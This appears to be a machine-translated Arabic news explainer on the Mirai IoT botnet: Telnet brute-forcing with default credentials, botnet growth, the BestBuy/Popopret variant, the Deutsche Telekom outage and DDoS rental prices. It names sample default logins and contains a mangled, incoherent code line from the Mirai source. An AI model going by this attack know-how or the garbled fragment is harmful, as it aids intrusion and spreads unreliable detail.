وماذا، هل يمكنه الاستيلاء على أي كاميرات مع ثلاجات؟

ليس حقيقيًا. تم تصميم Mirai للأجهزة التي تعمل بنظام Busybox - وهي مجموعة مبسطة من أدوات UNIX المساعدة سطر الأوامر، والذي يستخدم كواجهة رئيسية في المضمنة أنظمة التشغيل. يهاجم حصان طروادة منصات معينة فقط، مثل ARM وARM7 وMIPS وPPC وSH4 وSPARC وx86. فقط الأجهزة ذات إعدادات المصنع أو الحماية الضعيفة للغاية هي المعرضة للخطر - تحدث الإصابة باستخدام هجوم القوة الغاشمة على منفذ Telnet، والذي يتم من أجله استخدام القائمة الافتراضية لبيانات اعتماد المسؤول.

من غير الفعال إلى حد ما البحث في الإنترنت بالكامل عن كاميرات بدون كلمات مرور - أليس كذلك؟

لكنهم لم يخمنوا بشكل صحيح. استأجر صحفي من مجلة The Atlantic خادمًا وكتب برنامجًا يتظاهر بأنه محمصة خبز. أول هجوم على «جهاز منزلي» وقع بعد 40 دقيقة! وخلال الـ 11 ساعة التالية، تم اختراق المحمصة أكثر من 300 مرة. والحقيقة هي أن شبكات الروبوت قد وصلت إلى أحجام غير مسبوقة، ومساحة عنوان IPv4 لها صغيرة جدًا. علاوة على ذلك، تجدر الإشارة إلى أن المتسللين لا يبحثون عن الأجهزة المعرضة للخطر يدويًا - بل يتم ذلك عن طريق أعضاء شبكة الروبوتات. وبما أن كل "موظف" تم تحويله حديثًا يبدأ أيضًا في البحث عن الضحايا، فإن شبكة الروبوتات تنمو بشكل كبير.

هندسيا؟ فهل ستحتوي شبكات الروبوت خلال عام على تريليونات الأجهزة؟!

بالطبع لا 😀 الحقيقة هي أن عدد أجهزة إنترنت الأشياء محدود. وهذه بالفعل مشكلة ملحة للغاية. يعترف مؤلف Mirai أن الحد الأقصى لعدد الأجهزة على شبكته كان 380 ألفًا، وبعد عدة هجمات، عندما بدأ المستخدمون ومقدمو الخدمة في اتخاذ تدابير وقائية، انخفض عدد الأجهزة إلى 300 ألف ويستمر في الانخفاض.

بعد إتاحة الكود المصدري لبرنامج Mirai للجمهور، بدأ العديد من المتسللين في استخدامه. حاليًا، يبلغ عدد شبكات الروبوت الكبيرة المستندة إلى حصان طروادة حوالي 52. ومن الجدير بالذكر أن كل جهاز يمكن أن ينتمي إلى شبكة واحدة فقط - مباشرة بعد التقاط الجهاز، تحميه البرامج الضارة من إعادة الإصابة. الحالة الوحيدة التي يمكن فيها نقل الجهاز إلى "مالك" آخر هي عند إعادة تشغيل الجهاز. وفقًا للخبراء، بعد إعادة التشغيل، سيصاب الجهاز مرة أخرى خلال 30 ثانية.

إذن فعالية ميراي آخذة في التناقص؟

نعم. يضطر المتسللون إلى القتال من أجل كمية محدودة من الموارد، والتي تتناقص (بسبب الاحتياطات) بدلاً من النمو. ومما يزيد الوضع تعقيدًا حقيقة أن المتسللين أنانيون للغاية - على سبيل المثال، بعد إيقاف تشغيل خادم القيادة والتحكم الرئيسي (C&C) لشبكة الروبوتات - والآن تبين أن شبكة الروبوتات عديمة الفائدة وغير معرضة للهجمات الجديدة. كل شبكة جديدةالمبنية على Mirai ستكون أصغر حجمًا من سابقاتها ولن تكون قادرة إلا على تنفيذ هجمات منخفضة الطاقة. على سبيل المثال، خلال الانتخابات الأمريكية، تم تنفيذ هجمات ضعيفة على موقعي كلينتون وترامب. لم تسبب أي ضرر، ولم يلاحظها أحد على الإطلاق (باستثناء الشركة التي تراقب تصرفات حصان طروادة هذا على وجه التحديد).

انها واضحة. ما هي المعلومات الأخرى المثيرة للاهتمام المعروفة عن حصان طروادة هذا؟

وهو خليفة حصان طروادة آخر، المعروف بأسماء Gafgyt وLizkebab وBASHLITE وBash0day وBashdoor وTorlus. يُعرف الأخير بقدرته على إخضاع حوالي مليون كاميرا ويب، وفقًا لنفس المستوى 3 للاتصالات. ومن المعروف أيضًا أن معظم شبكات الروبوت لا تستخدم نسخة نقية من Mirai، بل تستخدم نسخها المعدلة (وهو أمر متوقع تمامًا).

آخر حقيقة مثيرة للاهتمامهو أن مستخدمي RuNet وجدوا في مصدر الرمزتتبع Mirai الروسي - يوجد في الملف cnc/admin.go نتيجة للتعليقات باللغة الروسية:

cnc/admin.go: this.conn.Write(بايت("\033))"

من ناحية أخرى، يبدو الأمر أشبه بمزحة - "تدقيق الحسابات..." هو نسخة واضحة (ترجمة آلية؟) من "تدقيق الحسابات".

في الشهر الماضي كانت هناك هجمات على مواقع كبيرة مثل تويترأو Spotify، الذي قام بتعطيلها مؤقتًا. تم استخدام الروبوتات لهذا الغرض ميراي، توحيد 400-500 ألف جهاز إنترنت الأشياء. الآن علم صحفيو Motherboard أن اثنين من المتسللين تمكنا من السيطرة على شبكة الروبوتات وإنشاء نسخة جديدة منها - فهي توحد بالفعل مليون جهاز. لقد اختبر المشتركون في المزود الألماني قوتها دويتشه تيليكوم، الذي كانت شبكته معطلة نهاية الأسبوع الماضي.

البحث عن ميراي

تمكن الصحفيون من التحدث إلى أحد هذين المتسللين الغامضين - وهو يستخدم لقب BestBuy. وفي محادثة مشفرة عبر الإنترنت، أخبرهم أن هناك صراعًا حقيقيًا بين المتسللين للسيطرة على ميراي. تم اكتشاف ثغرة أمنية مؤخرًا في برنامجها. استخدامه، إلى جانب سرعته، يمكن أن يسمح لـ BestBuy وشريكتها Popopret بالسيطرة على معظم شبكة الروبوتات وإضافة أجهزة جديدة إليها.

في السابق، درس خبراؤنا كود شبكة الروبوتات Mirai - وتبين أنه لم يتم إنشاؤه خصيصًا لأجهزة إنترنت الأشياء. تبحث البرامج الضارة عن الأجهزة المتصلة بالشبكة باستخدام معلومات تسجيل الدخول وكلمات المرور الافتراضية (admin:admin، root:password، وما إلى ذلك). وهذا يعني أنه، من الناحية النظرية، يمكن أن يشمل أي أجهزة، بما في ذلك أجهزة الكمبيوتر المنزلية والخوادم أو أجهزة التوجيه.

أجهزة إنترنت الأشياء- عادة أجهزة التوجيه - متضمنة الروبوتات ميرايحتى يتم إعادة تشغيله - ثم يتم مسح الدودة من ذاكرتهم. ومع ذلك، تقوم شبكة الروبوتات بمسح الإنترنت باستمرار بحثًا عن الأجهزة المعرضة للخطر، بحيث يمكن للجهاز "المعالج" أن يصبح جزءًا منه مرة أخرى بسرعة. هناك سباق حقيقي بين المتسللين ليكونوا أول من يصيب أكبر عدد ممكن من الأجهزة.

لا توجد معلومات حول كيفية تمكن مبتكري Mirai الجديد من التغلب على منافسيهم. ومع ذلك، فقد أخبروا المراسلين أنهم يستخدمون شبكة الروبوتات الخاصة بهم لفحص الأجهزة التي يحتمل أن تكون معرضة للخطر، بما في ذلك تلك التي كانت في السابق جزءًا من شبكة الروبوتات.

يقول BestBuy: "لماذا لا تقوم Mirai بمطاردة Mirai وتلتهم الأصل".

ليس ميراي فقط

ومع ذلك، فإن شبكة الروبوتات الجديدة لم تستوعب فقط أجهزة Mirai القديمة والأجهزة الجديدة التي تحتوي على كلمات مرور افتراضية. يستخدم منشئوها أيضًا ثغرات أمنية مدتها 0 يوم في البرامج الثابتة لأجهزة إنترنت الأشياء. وتوقع الخبراء في السابق الظهور الوشيك لمثل هذه الشبكات "المجمعة".

تصبح المعركة ضدهم أكثر تعقيدًا بشكل ملحوظ - إذا كان مستخدم الجهاز النهائي يحتاج فقط إلى تغيير تسجيل الدخول وكلمة المرور للوصول إليه من أجل مواجهة Mirai، فلن يتمكن من التعامل مع نقاط الضعف في الأداة بمفرده .

DDoS بسرعة 700 جيجابت في الثانية

بدأ المتسللون BestBuy وPopopret في الإعلان عن خدماتهم - فهم يوفرون إمكانية الوصول إلى خدماتهم نسخة جديدةميراي، إرسال رسائل غير مرغوب فيها عبر XMPP/Jabber،

وفقًا للهاكر، فإنهم يقدمون للعملاء عدة حزم من الخدمات. أرخص واحد يستحق كل هذا العناء $2 000 - لهذا المال يمكن للعملاء الاستئجار منه 20,000 إلى 25,000عقد الروبوتات لإطلاق الحراس لمدة تصل إلى أسبوعين، مع فترة استراحة مدتها خمسة عشر دقيقة بين الهجمات. خلف $15 000 أو $20 000 يتمتع العملاء الآن بفرصة إطلاق 600000 روبوت لهجمات مدتها ساعتين مع استراحة مدتها 30 أو 15 دقيقة. وفي الحالة الثانية ستكون قوة الهجوم 700 جيجابت/ثانيةاو اكثر.

الآفاق

أمان أجهزة إنترنت الأشياءغالبًا ما يكون عند مستوى منخفض إلى حد ما - وهذا ما يفسره حقيقة أن البائعين غالبًا ما لا يهتمون بتنفيذ تدابير إضافية أمن المعلومات. إنهم يعلنون عن سهولة استخدام منتجاتهم، لكن جميع الإجراءات الأمنية الإضافية تفرض قيودًا وتتطلب موارد.

كما هو مذكور أعلاه، يمكن فقط لمطوري الأجهزة النهائية أو مقدمي الخدمة الذين يقدمونها (في حالة أجهزة التوجيه) حماية المستخدمين من شبكات الروبوتات الأكثر تقدمًا. أعلنت شركة الاتصالات الألمانية Deutsche Telekom، المتضررة من هجوم الإصدار الجديد من Mirai، أنها ستعيد النظر في العلاقات التجارية مع موردي أجهزة التوجيه الضعيفة سبيدبورت، شركة أركاديان.

وفي نهاية المطاف، سيكون من الممكن زيادة مستوى أمان إنترنت الأشياء من خلال إدخال رقابة أكثر صرامة على الأجهزة من جانب مقدمي الخدمة، من ناحية، وتطوير المعايير والوثائق التنظيمية لإنترنت الأشياء، من ناحية أخرى. . وقد تم بالفعل اتخاذ تدابير مماثلة في العديد من البلدان لضمان سلامة أنظمة التحكم الآلي في العمليات. لقد تم بالفعل اتخاذ الخطوات الأولى في هذا الاتجاه - على سبيل المثال، نشر العديد من بائعي تكنولوجيا المعلومات وثيقة في سبتمبر تسمى الصناعية أمن الإنترنتالإطار (IISF)- يقترح اعتبار إنترنت الأشياء جزءًا من "الإنترنت الصناعي".

ومع ذلك، فإن المشكلة لا تزال بعيدة عن الحل النهائي، والمتسللين BestBuy و Popopretقد تحصل على احتكار على نطاق واسع هجمات DDoSمتصل. هذه حقيقة حزينة إلى حد ما، ولكن المتسللين أنفسهم، أثناء محادثة مع اللوحة الأمأعلنوا أن أنشطتهم لن تسترشد بالربح فحسب، بل بالمبادئ الأخلاقية أيضًا. لذلك قالت BestBuy إنها لن تسمح للعملاء بمهاجمة عناوين IP الخاصة بالشركات التي تعمل في البنية التحتية الحيوية.